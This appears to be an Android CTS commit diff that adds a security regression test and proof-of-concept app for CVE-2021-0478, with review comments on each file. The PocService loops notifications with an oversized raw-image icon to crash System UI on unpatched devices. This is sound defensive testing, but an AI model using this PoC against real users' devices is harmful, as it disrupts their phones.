CTS test for Android Security b/169255797
Bug: 169255797
Bug: 182917106
Test: Ran the new testcase on android-10.0.0_r39 with/without patch
Change-Id: I275716ca94810e52a37fea429477b41ab8230a23
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
new file mode 100644
index 0000000..a3b1eae
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0478.java
@@ -0,0 +1,71 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AsbSecurityTest;
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0478 extends SecurityTestCase {
+
+ /**
+ * b/169255797
+ */
+ @AsbSecurityTest(cveBugId = 169255797)
+ @SecurityTest(minPatchLevel = "2021-06")
+ @Test
+ public void testPocCVE_2021_0478() throws Exception {
+ final int SLEEP_INTERVAL_MILLISEC = 30 * 1000;
+ String apkName = "CVE-2021-0478.apk";
+ String appPath = AdbUtils.TMP_PATH + apkName;
+ String packageName = "android.security.cts.cve_2021_0478";
+ String crashPattern = "Canvas: trying to draw too large";
+ ITestDevice device = getDevice();
+
+ try {
+ /* Push the app to /data/local/tmp */
+ pocPusher.appendBitness(false);
+ pocPusher.pushFile(apkName, appPath);
+
+ /* Wake up the screen */
+ AdbUtils.runCommandLine("input keyevent KEYCODE_WAKEUP", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_MENU", device);
+ AdbUtils.runCommandLine("input keyevent KEYCODE_HOME", device);
+
+ /* Install the application */
+ AdbUtils.runCommandLine("pm install " + appPath, device);
+
+ /* Start the application */
+ AdbUtils.runCommandLine("am start -n " + packageName + "/.PocActivity", getDevice());
+ Thread.sleep(SLEEP_INTERVAL_MILLISEC);
+ } catch (Exception e) {
+ e.printStackTrace();
+ } finally {
+ /* Un-install the app after the test */
+ AdbUtils.runCommandLine("pm uninstall " + packageName, device);
+
+ /* Check if System UI has crashed thereby indicating the presence */
+ /* of the vulnerability */
+ String logcat = AdbUtils.runCommandLine("logcat -d *:S AndroidRuntime:E", device);
+ assertNotMatches(crashPattern, logcat);
+ }
+ }
+}
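Review bot: The `catch (Exception e) { e.printStackTrace(); }` in testPocCVE_2021_0478 lets the test pass when the push, install or activity start fails, because the only assertion then runs against a logcat that never saw the PoC; for a security test that is a false "not vulnerable" result. The method already declares `throws Exception`, so the catch can be dropped, and the output of `pm install` should be checked for success before the sleep. The log buffer is also never cleared, so an earlier `Canvas: trying to draw too large` entry from another test would fail this one; `AdbUtils.runCommandLine("logcat -c", device);` before the `am start` call avoids that. Minor: the `am start` call uses `getDevice()` while every other call uses the local `device`.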
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp
new file mode 100644
index 0000000..16094ca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/Android.bp
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+android_test_helper_app {
+ name: "CVE-2021-0478",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/android/security/cts/CVE_2021_0478/PocActivity.java",
+ "src/android/security/cts/CVE_2021_0478/PocService.java",
+ ],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml
new file mode 100644
index 0000000..d8ec56c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/AndroidManifest.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.cve_2021_0478"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
+ <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
+ <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
+ <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
+ <uses-permission android:name="android.permission.WAKE_LOCK" />
+
+ <application
+ android:allowBackup="true"
+ android:label="CVE-2021-0478"
+ android:supportsRtl="true">
+ <service
+ android:name=".PocService"
+ android:enabled="true"
+ android:exported="false" />
+
+ <activity android:name=".PocActivity">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
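Review bot: The manifest requests `RECEIVE_BOOT_COMPLETED` and `WRITE_SECURE_SETTINGS`, but nothing in the PocActivity or PocService added by this change registers a boot receiver or writes settings. The helper app should declare only what the PoC needs (as far as this diff shows: `ACCESS_FINE_LOCATION`, `FOREGROUND_SERVICE`, `WAKE_LOCK`), so that the test documents the real preconditions of the bug. `android:allowBackup="true"` serves no purpose for a throwaway test APK and can be set to `false` or removed. If the build targets API 31 or later, the launcher activity with an intent filter also needs an explicit `android:exported="true"`; the target level is not visible here.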
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml
new file mode 100644
index 0000000..a85bec9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2021 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<LinearLayout
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent">
+ <View
+ android:id="@+id/drawableview"
+ android:layout_width="match_parent"
+ android:layout_height="300dp" />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg
new file mode 100644
index 0000000..b829548
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/res/raw/image.jpg
Binary files differ
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java
new file mode 100644
index 0000000..65caacf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocActivity.java
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.cve_2021_0478;
+
+import android.app.Activity;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.Manifest;
+import android.os.Bundle;
+import android.os.PowerManager;
+import android.os.PowerManager.WakeLock;
+
+public class PocActivity extends Activity {
+ private WakeLock mScreenLock;
+ private Context mContext;
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ try {
+ mContext = this.getApplicationContext();
+ PowerManager pm = mContext.getSystemService(PowerManager.class);
+ mScreenLock = pm.newWakeLock(
+ PowerManager.SCREEN_BRIGHT_WAKE_LOCK | PowerManager.ACQUIRE_CAUSES_WAKEUP,
+ "PocActivity");
+ mScreenLock.acquire();
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+ startServices();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ }
+
+ void startServices() {
+ try {
+ startForegroundService(new Intent(this, PocService.class));
+ requestPermission();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ void requestPermission() {
+ try {
+ this.requestPermissions(new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 12);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ protected void onDestroy() {
+ super.onDestroy();
+ mScreenLock.release();
+ }
+}
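Review bot: `onDestroy()` calls `mScreenLock.release()` unconditionally, but `onCreate()` swallows every exception, so if `getSystemService` or `newWakeLock` fails the field is still null and teardown throws a NullPointerException; guard it with `if (mScreenLock != null && mScreenLock.isHeld()) mScreenLock.release();`. `super.onCreate(savedInstanceState)` sits inside the try after the wake-lock calls, so an early exception skips it and the framework then reports a SuperNotCalledException instead of the real failure; it should be the first statement, outside the try. The source directory is `CVE_2021_0478` while the declared package is `android.security.cts.cve_2021_0478`, which is worth aligning.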
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java
new file mode 100644
index 0000000..dfcedca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0478/src/android/security/cts/CVE_2021_0478/PocService.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.cve_2021_0478;
+
+import android.annotation.SuppressLint;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Service;
+import android.content.Intent;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+public class PocService extends Service {
+
+ private static long SCAN_DURATION_MILLIS = 60000;
+
+ public PocService() {}
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+ super.onCreate();
+ try {
+ NotificationManager notificationManager =
+ getSystemService(NotificationManager.class);
+ String id = "channel";
+ NotificationChannel notificationChannel =
+ new NotificationChannel(id, " ", NotificationManager.IMPORTANCE_NONE);
+ notificationManager.createNotificationChannel(notificationChannel);
+ @SuppressLint("ResourceType")
+ Notification notification = new Notification.Builder(this, id)
+ .setSmallIcon(Icon.createWithResource(this, R.raw.image))
+ .setContentTitle("hello").build();
+ int notificationID = 31;
+ long startTime = System.currentTimeMillis();
+ long endTime = startTime + SCAN_DURATION_MILLIS;
+ while (System.currentTimeMillis() < endTime) {
+ startForeground(notificationID, notification);
+ stopForeground(true);
+ }
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+}
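Review bot: The `startForeground`/`stopForeground` loop in `onCreate()` spins on the main thread for `SCAN_DURATION_MILLIS` (60 s) with no pause, while the host-side test waits only 30 s before uninstalling, so the loop never ends on its own and the service blocks its process's main thread the whole time. The constant should be `private static final`, and its name and value should match what the test actually waits for; the name suggests scanning, which the code does not do. A short comment above the loop stating why the notification is posted and removed repeatedly, and why a raw image resource is used as the small icon, would make the test's intent reviewable; neither is explained in the diff.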